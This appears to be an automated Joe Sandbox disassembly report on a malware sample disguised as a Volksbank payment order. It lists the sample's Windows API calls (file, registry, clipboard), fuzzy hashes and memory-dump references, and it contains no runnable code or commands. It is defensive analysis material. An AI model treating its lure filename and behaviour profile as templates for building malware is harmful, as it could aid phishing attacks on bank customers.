• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: AddressProc$FileModuleName
• String ID:
• API String ID: 3859505661-0
• Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
• Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
• Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
• Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
APIs
• ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
• Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
• Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
• Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
APIs
• WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0041056A,00000000,004538EC,00000002,?,00412758,00000000,00000000,?), ref: 0040A325
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
• Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
• Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
• Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
APIs
• FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
• Opcode ID: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
• Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
• Opcode Fuzzy Hash: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
• Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
APIs
• CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
• Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
• Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
• Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
APIs
• CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                                                          • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                                                                          • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                                                          • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                                                                          • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                                                                          • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                                                                          • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • EnumResourceNamesW.KERNELBASE(?,?,004148B6,00000000), ref: 0041494B
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: EnumNamesResource
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3334572018-0
                                                                                                                                                                                                                                          • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                                                                          • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FreeLibrary.KERNELBASE(00000000), ref: 0044DEB6
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                                                                          • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                                                                          • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseFind
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1863332320-0
                                                                                                                                                                                                                                          • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                                                                          • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Open
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 71445658-0
APIs
• GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• memset.MSVCRT ref: 004095FC
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
  • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
  • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
  • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
Similarity
• API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
• String ID:
• API String ID: 3655998216-0
APIs
• memset.MSVCRT ref: 00445426
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
Similarity
• API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
• String ID:
• API String ID: 1828521557-0
APIs
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
  • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
• memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
Similarity
• API ID: ??2@FilePointermemcpy
• String ID:
• API String ID: 609303285-0
APIs
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _wcsicmp
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2081463915-0
                                                                                                                                                                                                                                          • Opcode ID: d19f359b0b47db267e5fce9c2c3eaec783a9e0147a5c7e9f99ecd470ce03f4be
                                                                                                                                                                                                                                          • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d19f359b0b47db267e5fce9c2c3eaec783a9e0147a5c7e9f99ecd470ce03f4be
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                                                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2136311172-0
                                                                                                                                                                                                                                          • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                                                                          • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??2@??3@
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1936579350-0
                                                                                                                                                                                                                                          • Opcode ID: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                                                                                                                                                                                          • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                          • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                                                                                                                                          • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                          • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                                                                                                                          • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                          • Opcode ID: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                                                                                                                                                                                                          • Instruction ID: 5e082493cfe38c59748d9de5a46a99a47989c0e105afa31b953e1adb18ef7a34
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17900282455501105C0425755C06505110808A313A376074A7032955D1CE188060601D
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                                                                                                                                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
• GetLastError.KERNEL32 ref: 0040995D
• CloseHandle.KERNEL32(?), ref: 00409969
• GetLastError.KERNEL32 ref: 00409974
• CloseClipboard.USER32 ref: 0040997D
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
• String ID:
• API String ID: 3604893535-0
• Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
• Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
